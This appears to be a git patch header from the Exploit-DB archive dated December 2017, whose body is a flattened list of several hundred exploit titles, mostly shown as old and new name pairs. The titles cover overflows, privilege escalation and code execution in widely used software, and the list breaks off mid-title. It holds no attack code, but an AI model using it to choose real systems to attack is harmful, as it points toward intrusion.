From a24ecf72c3e9f1f94e3b2c535d8ae5c057239cf6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 1 Dec 2017 10:57:46 +0000
Subject: [PATCH] DB: 2017-12-01
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

82 changes to exploits/shellcodes

32 new exploits/shellcodes

Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC) Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC) CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC) Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC) Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow FontForge - '.BDF' Font File Stack Based Buffer Overflow FontForge - '.BDF' Font File Stack Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC) Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC) Citrix XenApp / XenDesktop - Stack Based Buffer Overflow Citrix XenApp / XenDesktop - Stack Buffer Overflow Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC) Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC) IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC) mcrypt 2.6.8 - Stack Buffer Overflow (PoC) MySQL
(Linux) - Stack Based Buffer Overrun (PoC) MySQL (Linux) - Heap Based Overrun (PoC) MySQL (Linux) - Stack Buffer Overrun (PoC) MySQL (Linux) - Heap Overrun (PoC) Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'DownloadURLToFile()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'Load()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'CheckCompatibility()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Unicode Stack Buffer Overflow DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (1) Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow Multiple Vendor Telnet Client - Env_opt_add Heap Buffer Overflow SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Overflow Winamp 5.63 - Stack Based Buffer Overflow Winamp 5.63 - Stack Buffer Overflow Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056) Microsoft Internet 
Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056) MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow ProWizard 4 PC 1.62 - Multiple Remote Stack Buffer Overflow Vulnerabilities WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow Google Android Web Browser - '.GIF' File Heap Buffer Overflow Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC) Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC) NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow FFmpeg libavformat - 'psxstr.c' STR Data Heap Buffer Overflow OpenVms 8.3 Finger Service - Stack Based Buffer Overflow OpenVms 8.3 Finger Service - Stack Buffer Overflow Free Download Manager - Stack Based Buffer Overflow Free Download Manager - Stack Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Buffer Overflow Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File Valhala Honeypot 1.8 - Stack Based Buffer Overflow Valhala Honeypot 1.8 - Stack Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Buffer Overflow Xion Audio Player 1.5 
build 155 - Stack Based Buffer Overflow Xion Audio Player 1.5 build 155 - Stack Buffer Overflow Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow Last PassBroker 3.2.16 - Stack Based Buffer Overflow Last PassBroker 3.2.16 - Stack Buffer Overflow FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read FBZX 2.10 - Local Stack Based Buffer Overflow TACK 1.07 - Local Stack Based Buffer Overflow FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read FBZX 2.10 - Local Stack Buffer Overflow TACK 1.07 - Local Stack Buffer Overflow Gnome Nautilus 3.16 - Denial of Service Wireshark - iseries_parse_packet Heap Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow Wireshark - iseries_parse_packet Heap Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Buffer Overflow Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Buffer Overflow Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow Wireshark - find_signature Stack Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow Wireshark - getRate Stack Based Out-of-Bounds Read Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Buffer Overflow Wireshark - find_signature Stack Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Buffer Overflow Wireshark - getRate Stack Out-of-Bounds Read Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1) Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read Wireshark - 
'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1) pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Out-of-Bounds Read pdfium - CPDF_Function::Call Stack Based Buffer Overflow pdfium - CPDF_Function::Call Stack Buffer Overflow pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Buffer Overflow Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC) glibc - 'getaddrinfo' Stack Buffer Overflow (PoC) Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow libxml2 - xmlDictAddString Heap Based Buffer Overread libxml2 - xmlParseEndTag2 Heap Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread libxml2 - htmlCurrentChar Heap Based Buffer Overread Wireshark - vwr_read_s2_s3_W_rec Heap Buffer Overflow libxml2 - xmlDictAddString Heap Buffer Overread libxml2 - xmlParseEndTag2 Heap Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread libxml2 - htmlCurrentChar Heap Buffer Overread Kamailio 4.3.4 - Heap Based Buffer Overflow Wireshark - 
dissect_pktc_rekey Heap Based Out-of-Bounds Read Kamailio 4.3.4 - Heap Buffer Overflow Wireshark - dissect_pktc_rekey Heap Out-of-Bounds Read Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow Wireshark - dissect_2008_16_security_4 Stack Buffer Overflow Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2) Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (2) Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Microsoft Windows - 'gdi32.dll' Heap Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads Graphite2 - GlyphCache::GlyphCache Heap Buffer Overflow Graphite2 - GlyphCache::Loader Heap Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Memory Corruption Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Buffer Overflow (MS16-097) Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based 
Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011) Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap Buffer Overflow (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!MergeLigRecords' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption Around 'USP10!BuildFSM' (MS17-011) Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011) Microsoft Windows - Uniscribe Font Processing 
Multiple Heap Out-of-Bounds and Wild Reads (MS17-011) Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013) Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013) SAP SAPCAR 721.510 - Heap-Based Buffer Overflow SAP SAPCAR 721.510 - Heap Buffer Overflow Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap Memory Corruption LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack Buffer Overflow OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow OpenJPEG - 'mqc.c' Heap Buffer Overflow tcprewrite - Heap-Based Buffer Overflow tcprewrite - Heap Buffer Overflow Dnsmasq < 2.78 - 2-byte Heap-Based Overflow Dnsmasq < 2.78 - Heap-Based Overflow Dnsmasq < 2.78 - Stack-Based Overflow Dnsmasq < 2.78 - 2-byte Heap Overflow Dnsmasq < 2.78 - Heap Overflow Dnsmasq < 2.78 - Stack Overflow binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow PHP 7.1.8 - Heap-Based Buffer Overflow PHP 7.1.8 - Heap Buffer Overflow QEMU - NBD Server Long Export Name Stack Buffer Overflow Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation BSDi 3.0 inc - Local Buffer Overflow / Local Privilege Escalation RedHat 6.1 - 'man' Local Overflow / Privilege Escalation RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation AIX lquerylv - Local 
Buffer Overflow / Privilege Escalation AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC) libxml 2.6.12 nanoftp - Buffer Overflow (PoC) Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation XMail 1.21 - '-t' Command Line Option Local Buffer Overflow / Local Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation Microsoft Excel - Remote Code Execution Microsoft Excel - Code Execution HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation HP-UX 11i - 'swpackage' Local Stack Overflow / Local Privilege Escalation HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation News Rover 12.1 Rev 1 - Remote Stack Overflow (1) News Rover 12.1 Rev 1 - Stack Overflow (1) News Rover 12.1 Rev 1 - Remote Stack Overflow (2) News Rover 12.1 Rev 1 - Stack Overflow (2) FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow Apple Mac OSX - 'mount_smbfs' Local Stack Buffer 
Overflow VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit) MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Buffer Overflows Libmodplug - 's3m' Remote Buffer Overflow Libmodplug - 's3m' Buffer Overflow Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin) Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin) EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC) EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC) Microsoft Visio 2002 - '.DXF' File Stack based Overflow Microsoft Visio 2002 - '.DXF' Local Stack Overflow AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit) AOL 9.5 - 'Phobos.Playlist Import()' Stack Buffer Overflow (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit) CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (SEH) (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit) CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (Metasploit) Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit) Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit) Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Local Privilege Escalation BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 
'xlock' Local Overflow / Local Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (3) S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Local Privilege Escalation Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation Solaris 7.0 - 'kcms_configure' Local Overflow / Local Privilege Escalation Internet Download Manager - Stack Based Buffer Overflow Internet Download Manager - Local Stack Buffer Overflow AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation AFD 1.2.x - Working Directory Local Buffer Overflow / Local Privilege Escalation mcrypt 2.5.8 - Stack Based Overflow mcrypt 2.5.8 - Local Stack Overflow Sendmail 8.12.9 
- 'Prescan()' Variant Remote Buffer Overrun Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020) Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020) Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1) Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1) Winamp 5.12 - '.m3u' Stack Based Buffer Overflow Winamp 5.12 - '.m3u' Local Stack Buffer Overflow RealNetworks RealOne Player/RealPlayer - '.RM' Local Stack Buffer Overflow KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow Super Player 3500 - '.m3u' Local Stack Buffer Overflow IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color() GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color() GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Local 
Privilege Escalation BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack Buffer Overflow BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow Sim Editor 6.6 - Stack Based Buffer Overflow Sim Editor 6.6 - Local Stack Buffer Overflow Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022) Microsoft Word - Local Machine Zone Code Execution (MS15-022) Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow EasyCafe Server 2.2.14 - Remote File Read Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2) Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Excel - Out-of-Bounds Read Code Execution (MS16-042) TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow NRSS Reader 0.3.9 - Local Stack Based Overflow NRSS Reader 0.3.9 - Local Stack Overflow Linux - ecryptfs and /proc/$pid/environ Privilege Escalation Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099) NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation NVIDIA Driver 
- NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout) Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution Man-db 2.6.7.1 - Local Privilege Escalation (PoC) Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit) Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit) PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution PDF-XChange Viewer 2.5 Build 314.0 - Code Execution Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2) UCOPIA Wireless Appliance 